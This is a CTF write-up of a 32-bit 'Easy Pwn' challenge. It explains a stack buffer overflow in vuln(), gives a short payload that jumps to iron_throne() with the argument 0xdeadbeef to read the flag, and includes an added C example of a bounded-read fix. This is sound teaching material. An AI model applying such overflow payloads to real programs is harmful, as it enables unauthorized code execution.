InCTF Jr Qualifiers 2021
Starts 6PM, 28th Dec

Game Of Pwns

Easy Pwn

Author: NightKing

A 32-bit binary has been given.

Decompilation

Looking at the vuln() function:

There is scope for a buffer overflow here: the read() call accepts an input length (0x54) larger than the memory allocated for the buffer (0x2c).
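The flaw described above next to a bounded replacement, as an added C illustration (not the challenge's source; `bounded_read` and `demo_oversized_input` are hypothetical names, and only the sizes 0x2c and 0x54 come from the writeup):

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x2c /* buffer size reported in the writeup */
#define READ_LEN 0x54 /* length the read() call accepted */

/* Pattern the writeup describes (reconstructed, not the challenge source):
 *     char buf[BUF_SIZE];
 *     read(0, buf, READ_LEN);    0x54 > 0x2c, so bytes land past buf
 * Hardened form: the length is derived from the destination's capacity,
 * with one byte reserved for the terminator. */
ssize_t bounded_read(int fd, char *dst, size_t cap)
{
    if (dst == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, dst, cap - 1);
    if (n < 0)
        return -1;
    dst[n] = '\0';
    return n;
}

/* Constructed check: push READ_LEN bytes through a pipe into a BUF_SIZE
 * buffer. Returns the bytes stored, or -2 if the adjacent guard changed. */
int demo_oversized_input(void)
{
    struct { char buf[BUF_SIZE]; unsigned guard; } frame;
    char input[READ_LEN];
    int fds[2];

    frame.guard = 0xC0FFEEu;
    memset(input, 'a', sizeof input);
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input)
        return -1;
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);
    return frame.guard == 0xC0FFEEu ? (int)n : -2;
}

int main(void)
{
    printf("stored %d of %d bytes\n", demo_oversized_input(), READ_LEN);
    return 0;
}
```

Passing `sizeof` of the destination instead of a separate length constant keeps the read inside the buffer even when the input is longer.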

If we read the challenge description, it is pretty clear that we have to find the iron throne. And while decompiling/debugging, we see an iron_throne() function.

Aahaa !!

We see that iron_throne() is called with a parameter that is then compared against the number -0x2152411, which translates to 0xdeadbeef.

If the check passes, we get the flag through system("cat flag.txt").

Crafting the exploit

payload = b'a'*44                            # the required buffer (0x2c bytes)
payload += b'x'*12                           # padding required to reach the eip
payload += p32(elf.symbols["iron_throne"])   # address of iron_throne()
payload += p32(0xdeadbeef)+p32(0xdeadbeef)   # return address for iron_throne(), then its parameter (both 0xdeadbeef)

The final exploit